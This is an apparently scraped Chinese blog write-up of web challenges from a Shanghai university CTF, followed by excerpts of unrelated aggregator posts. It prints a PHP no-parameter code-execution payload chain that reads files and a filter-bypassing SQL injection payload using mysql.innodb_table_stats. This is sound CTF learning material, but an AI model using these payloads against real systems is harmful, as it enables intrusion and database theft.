上海大學生網路安全大賽 web write up

2021-09-29 08:43:47 字數 1636 閱讀 3151

這週做了一下,貼出做出來的web題。

?x='/th7s_is_flag');
flag

首先構造數字46

chr(next(ord(strrev(crypt(serialize(array())))));# 有概率得到46

chdir(next(scandir(chr(ord(strrev(crypt(serialize(array()))))))));#改變目錄

echo(implode(file(end(scandir(chr(ord(strrev(crypt(serialize(array()))))))))));#讀取檔案

把第二個和第三個合起來得到payload:

echo(implode(file(end(scandir(chr(ord(strrev(crypt(serialize(array(chdir(next(scandir(chr(ord(strrev(crypt(serialize(array())))))))))))))))))));

多訪問幾次就能getflag了

簡單檢視一下網頁,注入點應該在這

簡單fuzz一下,發現過濾了如下(可能不全)

我們使用如下語句可以檢視到資料庫版本,和庫名

這邊過濾了or,我們就不能使用imformation_schema了,但是這邊mysql的版本是5.6.46 ,有新特性,innodb_index_stats和 innodb_table_stats。

所以直接爆表

id=0' union/**/select * from (select 1)a join (select group_concat(table_name) from mysql.innodb_table_stats where database_name=schema())b join (select 3)c join (select version())d %23
結果如下

這下就很簡單了,無列名注入,直接出flag。

2018上海市大學生網路安全大賽 逆向 cpp

一道簡單的逆向,就是兩個函式加密,反著來一遍就行,不用爆破。for i 0 i for i 0 i 3 i usr bin env python coding utf 8 la 153,176,135,158,112,232,65,68,0x5,0x4,0x8b,0x9a,0x74,0xbc,0x5...

愛滋女大學生網路日記 摘錄

花開花落,每種花都有自己的花期,無論你對它給予多大的希望,它也會枯萎,也會凋謝。生命不也是如此嗎?不管花期長短?我們能做花叢中最艷的那枝就足夠了。用單純的眼光看世界,用真誠的心態和任何人交流,積極,樂觀的態度對待生活。病魔並不可怕,可怕的是你沒有健康的心態,真面生活的勇氣。人生事實上就是乙個大悲劇,...

第四屆上海大學生資訊保安比賽 web2

這道題目是一道 審計題 原始碼 題目思路是 變數覆蓋,反序列化漏洞 看到原始碼裡面有parse str 函式,這個函式如果沒有帶 array 這個引數,將會導致變數被重新賦值 過first 過 var a var give 過 bbb a var give 26bbb me 這裡用 26不能用 是因...